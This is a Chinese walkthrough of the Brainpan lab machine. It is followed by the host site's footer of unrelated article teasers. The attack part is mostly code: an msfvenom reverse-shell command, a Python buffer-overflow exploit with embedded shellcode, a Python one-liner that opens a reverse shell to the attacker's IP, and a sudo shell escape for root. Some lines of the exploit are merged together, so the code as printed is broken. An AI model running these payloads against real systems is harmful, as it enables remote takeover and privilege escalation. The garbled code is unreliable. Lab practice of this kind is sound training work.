【brainpan靶场渗透】

文章目录

一、基础信息

二、信息收集

三、反弹shell

四、提权


一、基础信息

Kali IP:192.168.20.146

靶机 IP:192.168.20.155

二、信息收集

似乎开放了9999,10000端口,访问页面没有太多内容,扫描一下目录

dirsearch -u "http://192.168.20.155:10000" -x 403

有个bin目录,访问一下

将文件下载下来,后续不清楚咋搞了

看wp了解到后续又是涉及到缓冲区溢出漏洞,有点复杂了,不太懂,可自行搜索其他wp

如:https://blog.csdn.net/m0_62652276/article/details/135352714

下面直接写解题步骤

三、反弹shell

使用msfvenom创建反弹shell的负载

msfvenom -p windows/shell_reverse_tcp LHOST=192.168.20.146 LPORT=9090 -b "\x00" -f py -o shellcode.txt

我们使用如下命令,将buf替换为shellcode

sed -i s/buf/shellcode/g shellcode.txt

创建exp.py

import socket
server = ("192.168.20.155", 9999)
rubbish = b'A' * 524
eip = b'\xF3\x12\x17\x31'
nop = b'\x90' * 16shellcode =  b""
shellcode += b"\xba\x21\xd1\xd8\x7a\xda\xd7\xd9\x74\x24\xf4\x5f"
shellcode += b"\x29\xc9\xb1\x52\x31\x57\x12\x83\xef\xfc\x03\x76"
shellcode += b"\xdf\x3a\x8f\x84\x37\x38\x70\x74\xc8\x5d\xf8\x91"
shellcode += b"\xf9\x5d\x9e\xd2\xaa\x6d\xd4\xb6\x46\x05\xb8\x22"
shellcode += b"\xdc\x6b\x15\x45\x55\xc1\x43\x68\x66\x7a\xb7\xeb"
shellcode += b"\xe4\x81\xe4\xcb\xd5\x49\xf9\x0a\x11\xb7\xf0\x5e"
shellcode += b"\xca\xb3\xa7\x4e\x7f\x89\x7b\xe5\x33\x1f\xfc\x1a"
shellcode += b"\x83\x1e\x2d\x8d\x9f\x78\xed\x2c\x73\xf1\xa4\x36"
shellcode += b"\x90\x3c\x7e\xcd\x62\xca\x81\x07\xbb\x33\x2d\x66"
shellcode += b"\x73\xc6\x2f\xaf\xb4\x39\x5a\xd9\xc6\xc4\x5d\x1e"
shellcode += b"\xb4\x12\xeb\x84\x1e\xd0\x4b\x60\x9e\x35\x0d\xe3"
shellcode += b"\xac\xf2\x59\xab\xb0\x05\x8d\xc0\xcd\x8e\x30\x06"
shellcode += b"\x44\xd4\x16\x82\x0c\x8e\x37\x93\xe8\x61\x47\xc3"
shellcode += b"\x52\xdd\xed\x88\x7f\x0a\x9c\xd3\x17\xff\xad\xeb"
shellcode += b"\xe7\x97\xa6\x98\xd5\x38\x1d\x36\x56\xb0\xbb\xc1"
shellcode += b"\x99\xeb\x7c\x5d\x64\x14\x7d\x74\xa3\x40\x2d\xee"
shellcode += b"\x02\xe9\xa6\xee\xab\x3c\x68\xbe\x03\xef\xc9\x6e"
shellcode += b"\xe4\x5f\xa2\x64\xeb\x80\xd2\x87\x21\xa9\x79\x72"
shellcode += b"\xa2\x16\xd5\x68\xa0\xff\x24\x90\xe7\x7d\xa1\x76"
shellcode += b"\x8d\x91\xe4\x21\x3a\x0b\xad\xb9\xdb\xd4\x7b\xc4"
shellcode += b"\xdc\x5f\x88\x39\x92\x97\xe5\x29\x43\x58\xb0\x13"
shellcode += b"\xc2\x67\x6e\x3b\x88\xfa\xf5\xbb\xc7\xe6\xa1\xec"
shellcode += b"\x80\xd9\xbb\x78\x3d\x43\x12\x9e\xbc\x15\x5d\x1a"
shellcode += b"\x1b\xe6\x60\xa3\xee\x52\x47\xb3\x36\x5a\xc3\xe7"
shellcode += b"\xe6\x0d\x9d\x51\x41\xe4\x6f\x0b\x1b\x5b\x26\xdb"
shellcode += b"\xda\x97\xf9\x9d\xe2\xfd\x8f\x41\x52\xa8\xc9\x7e"
shellcode += b"\x5b\x3c\xde\x07\x81\xdc\x21\xd2\x01\xec\x6b\x7e"
shellcode += b"\x23\x65\x32\xeb\x71\xe8\xc5\xc6\xb6\x15\x46\xe2"
shellcode += b"\x46\xe2\x56\x87\x43\xae\xd0\x74\x3e\xbf\xb4\x7a"
shellcode += b"\xed\xc0\x9c"
buf = rubbish + eip + nop + shellcodes = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(server)
s.send(buf)
s.close()

然后赋予可执行权限进行执行,kali开启监听端口即可反弹

当前仍处于win虚拟环境当中,需要进行Win虚拟环境逃逸

由上可知当前环境有python环境,可利用python再反弹一次shell

/usr/bin/python3 -c "import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('192.168.20.146',8081));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn('sh')"
python -c 'import pty;pty.spawn("/bin/bash")'

四、提权

尝试sudo提权,发现有可利用的信息

可进行提权,sudo尝试后提示输入命令

输入ls后在光标处输入!/bin/bash,提权成功

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/news/891112.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

matlab reshape permute

1.reshape 将向量按照顺序重新构建 矩阵,新矩阵 先排完第一列, 再第二列… 2.permute 将向量 维度变换

comctl32.dll没有被指定在window运行怎么解决?

一、文件丢失问题:comctl32.dll没有被指定在Windows上运行怎么解决? comctl32.dll是Windows操作系统中的一个重要组件,它负责提供用户界面元素,如按钮、对话框和列表视图等。当系统提示“comctl32.dll没有被指定在Windows上运行”…

Qt下使用AES进行字符串加密解密

文章目录 前言一、获取QAESEncryption库二、加密与解密实现三、示例完整代码四、下载链接总结 前言 引用:AES(Advanced Encryption Standard)是一种对称加密算法,被广泛用于数据加密,提供128、192、256位三种密钥长度&…

docker 安装minio

docker pull minio/minio #启动 mkdir -p /root/minio/config mkdir -p /root/minio/datadocker run -d \--name minio \-p 9002:9000 \-p 9001:9001 \--restartalways \-v /root/minio/data:/data \-v /root/minio/config:/root/.minio \-e "MINIO_ACCESS_KEYminioadmin…

Linux系统下安装配置 Nginx 超详细图文教程

一、下载Nginx安装包 nginx官网:nginx: download[这里是图片001]http://nginx.org/en/download.html 找到我们所需要版本,把鼠标移动到上面,右键打开链接进行下载 或者如果Linux联网,直接在Linux服务上使用wget命令把Nginx安装包…

爬虫与反爬虫实现全流程

我选取的网页爬取的是ppt nba版 需要的工具:pycharm,浏览器 爬虫需要观察它的网页信息,然后开始首先爬取它的html,可以看到有人气,标题,日期,咨询 可以看到用get方法 import requests url"https://img-home.csdnimg.cn/images/20230724024159.png?origin_urlhttps%3A%2…

最新版Edge浏览器加载ActiveX控件技术——alWebPlugin中间件V2.0.28-迎春版发布

allWebPlugin简介 allWebPlugin中间件是一款为用户提供安全、可靠、便捷的浏览器插件服务的中间件产品,致力于将浏览器插件重新应用到所有浏览器。它将现有ActiveX控件直接嵌入浏览器,实现插件加载、界面显示、接口调用、事件回调等。支持Chrome、Firefo…

OSPFv2协议状态切换(状态机)基本原理-RFC2328

个人认为,理解报文就理解了协议。通过报文中的字段可以理解协议在交互过程中相关传递的信息,更加便于理解协议。 自动换行 OSPFv2: 关于 OSPFv2 协议基本原理,可参考RFC2328-OSPF Version 2。 其他相关资料可参考: …

【最新】沃德协会管理系统源码+uniapp前端+环境教程

一.系统介绍 一款基于FastAdminThinkPHPUniapp开发的商协会系统,新一代数字化商协会运营管理系统,以“智慧化会员体系、智敏化内容运营、智能化活动构建”三大板块为基点,实施功能全场景覆盖,一站式解决商协会需求壁垒&#xff0…

【LeetCode: 83. 删除排序链表中的重复元素 + 链表】

🚀 算法题 🚀 🌲 算法刷题专栏 | 面试必备算法 | 面试高频算法 🍀 🌲 越难的东西,越要努力坚持,因为它具有很高的价值,算法就是这样✨ 🌲 作者简介:硕风和炜,…

算法练习——模拟题

前言:模拟题的特点在于没有什么固定的技巧,完全考验自己的代码能力,因此有助于提升自己的代码水平。如果说一定有什么技巧的话,那就是有的模拟题能够通过找规律来简化算法。 一:替换所有问号 题目要求: 解…

Idea创建JDK17的maven项目失败

Idea创建JDK17的maven项目失败 Error occurred during initialization of VM Could not find agent library instrument on the library path, with error: Can’t find dependent libraries Possible solution: Check your maven runner VM options. Open Maven Runner setti…

VSCode设置Playwright教程

1.安装扩展 打开VS Code,在扩展—>搜索"Playwright Test for VSCode",点击安装 按快捷键CommandShiftP,输入install playwright,点击安装Playwright 安装成功会有如下提示 2.调试脚本 打开tests/example.spec.ts文…

HTML新特性|01 音频视频

音频 1、Audio (音频) HTML5提供了播放音频文件的标准 2、control(控制器) control 属性供添加播放、暂停和音量控件 3、标签: <audio> 定义声音 <source> 规定多媒体资源,可以是多个<!DOCTYPE html> <html lang"en"> <head><…

【深度学习】卷积网络代码实战ResNet

ResNet (Residual Network) 是由微软研究院的何凯明等人在2015年提出的一种深度卷积神经网络结构。ResNet的设计目标是解决深层网络训练中的梯度消失和梯度爆炸问题&#xff0c;进一步提高网络的表现。下面是一个ResNet模型实现&#xff0c;使用PyTorch框架来展示如何实现基本的…

雷电「模拟器」v9 最新清爽去广

前言 雷电模拟器9是基于安卓9内核开发的全新版本模拟器 安装环境 [名称]&#xff1a;雷电「模拟器」 [大小]&#xff1a;579MB [版本]&#xff1a;9.1.34 [语言]&#xff1a;简体中文 [安装环境]&#xff1a;Windows 通过网盘分享的文件&#xff1a;雷电模拟器 链接:…

大模型 API 接入初探

文章目录 大模型 API 接入初探一、使用大模型 API 的前置步骤&#xff08;一&#xff09;注册账户与获取凭证&#xff08;二&#xff09;理解 API 文档 二、三个常用 API&#xff08;一&#xff09;列出模型&#xff08;二&#xff09;FIM 补全&#xff08;三&#xff09;对话补…

实时在线翻译谷歌插件

Real - time Translation插件的安装 1、下载插件并解压 2、打开谷歌浏览器&#xff0c;在地址栏输入 “chrome://extensions/” 进入扩展程序页面. 3、开启页面右上角的 “开发者模式”. 4、点击 “加载已解压的扩展程序” 按钮&#xff0c;选择之前解压的文件夹&#xff0c;点…

[数据集][图像分类]常见鱼类分类数据集2w张8类别

数据集类型&#xff1a;图像分类用&#xff0c;不可用于目标检测无标注文件 数据集格式&#xff1a;仅仅包含jpg图片&#xff0c;每个类别文件夹下面存放着对应图片 图片数量(jpg文件个数)&#xff1a;7554&#xff08;剩余1w多为测试集&#xff09; 分类类别数&#xff1a;…

uniapp开发小程序内嵌h5页面,video视频两边有细小黑色边框

1.问题如图 2.原因分析 是否为设置上述属性呢&#xff1f; 设置了&#xff0c;但是仍然有黑边。经过选中页面元素分析后&#xff0c;判断video元素本身就有这种特点&#xff0c;就是视频资源无法完全铺满元素容器。 3.解决方案